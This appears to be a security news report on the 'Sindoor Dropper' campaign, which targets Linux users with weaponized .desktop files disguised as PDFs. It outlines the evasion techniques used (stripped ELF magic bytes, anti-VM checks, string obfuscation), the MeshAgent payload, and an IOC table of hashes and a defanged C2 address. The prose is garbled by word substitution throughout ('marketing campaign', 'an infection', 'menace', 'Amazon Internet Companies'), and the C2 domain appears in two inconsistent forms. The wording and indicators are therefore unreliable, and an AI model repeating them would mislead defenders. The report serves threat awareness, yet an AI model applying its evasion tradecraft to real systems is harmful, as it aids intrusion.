A brand new malware marketing campaign, dubbed “Sindoor Dropper,” is focusing on Linux techniques utilizing subtle spear-phishing methods and a multi-stage an infection chain.
The marketing campaign leverages lures themed across the current India-Pakistan battle, referred to as Operation Sindoor, to entice victims into executing malicious information.
This exercise’s standout characteristic is its reliance on weaponized .desktop information, a way beforehand related to the superior persistent menace (APT) group APT36, also called Clear Tribe or Mythic Leopard.
The assault begins when a consumer opens a malicious .desktop file, named “Note_Warfare_Ops_Sindoor.pdf.desktop,” which masquerades as a typical PDF doc.
In keeping with Nextron system evaluation, upon execution, it opens a benign decoy PDF to keep up the phantasm of legitimacy whereas silently initiating a fancy, closely obfuscated an infection course of within the background.
‘Sindoor Dropper’ Malware Targets Linux Techniques
This course of is designed to evade each static and dynamic evaluation, with the preliminary payload reportedly having zero detections on VirusTotal on the time of its discovery.
‘Sindoor Dropper’ Malware Targets Linux Techniques
The .desktop file downloads a number of parts, together with an AES decryptor (mayuw) and an encrypted downloader (shjdfhd).
The decryptor, a Go binary full of UPX, is deliberately corrupted by stripping its ELF magic bytes, more likely to bypass safety scans on platforms like Google Docs. The .desktop file restores these bytes on the sufferer’s machine to make the binary executable once more.
This kicks off a multi-stage course of the place every element decrypts and runs the following. The chain contains primary anti-virtual machine checks, reminiscent of verifying board and vendor names, blacklisting particular MAC deal with prefixes, and checking machine uptime.
All strings inside the droppers are obfuscated utilizing a mix of Base64 encoding and DES-CBC encryption to additional hinder evaluation.
The ultimate payload is a repurposed model of MeshAgent, a respectable open-source distant administration device. As soon as deployed, MeshAgent connects to a command-and-control (C2) server hosted on an Amazon Internet Companies (AWS) EC2 occasion at wss://boss-servers.gov.in.indianbosssystems.ddns[.]internet:443/agent.ashx.
This offers the attacker full distant entry to the compromised system, enabling them to watch consumer exercise, transfer laterally throughout the community, and exfiltrate delicate knowledge, Nextron stated.
The Sindoor Dropper marketing campaign highlights an evolution in menace actor tradecraft, demonstrating a transparent give attention to Linux environments, which phishing campaigns have much less focused.
IOCs for Sindoor Dropper
IOC TypeIndicatorDescriptionFile Hash9943bdf1b2a37434054b14a1a56a8e67aaa6a8b733ca785017d3ed8c1173ac59Initial phishing payload (Note_Warfare_Ops_Sindoor.pdf.desktop) File Hash9a1adb50bb08f5a28160802c8f315749b15c9009f25aa6718c7752471db3bb4bDecrypted AES decryptor (mayuw) File Hash0f4ef1da435d5d64ccc21b4c2a6967b240c2928b297086878b3dcb3e9c87aa23Stage 2 downloader (shjdfhd) File Hash38b6b93a536cbab5c289fe542656d8817d7c1217ad75c7f367b15c65d96a21d4Stage 3 downloader (inter_ddns) and the decrypted MeshAgent payload (server2) File Hash05b468fc24c93885cad40ff9ecb50594faa6c2c590e75c88a5e5f54a8b696ac8MeshAgent last payload (server2) File Hashba5b485552ab775ce3116d9d5fa17f88452c1ae60118902e7f669fd6390eae97Decoy PDF doc (/tmp/Note_Warfare.pdf) FilenameNote_Warfare_Ops_Sindoor.pdf.desktopThe preliminary weaponized .desktop file used for phishingFilename/tmp/Note_Warfare.pdfThe benign decoy doc exhibited to the victimFilenamemayuwAES decryptor payloadFilenameshjdfhdEncrypted Stage 2 downloaderFilenameaccessAES decryptor for the following stage Filenameinter_ddnsStage 3 downloader Filenameserver2The last MeshAgent payload Networkwss://boss-servers.gov.in.indianbosssystems.ddns[.]internet:443/agent.ashxCommand-and-control (C2) server URL for the MeshAgent payload Networkindianbosssystems.ddns[.]netMalicious C2 area Network54.144.107[.]42IP deal with of the C2 server, hosted on AWS
By combining well timed, region-specific social engineering with superior evasion methods, the attackers enhance their probability of efficiently compromising delicate networks.
Discover this Story Attention-grabbing! Observe us on Google Information, LinkedIn, and X to Get Extra Immediate Updates.
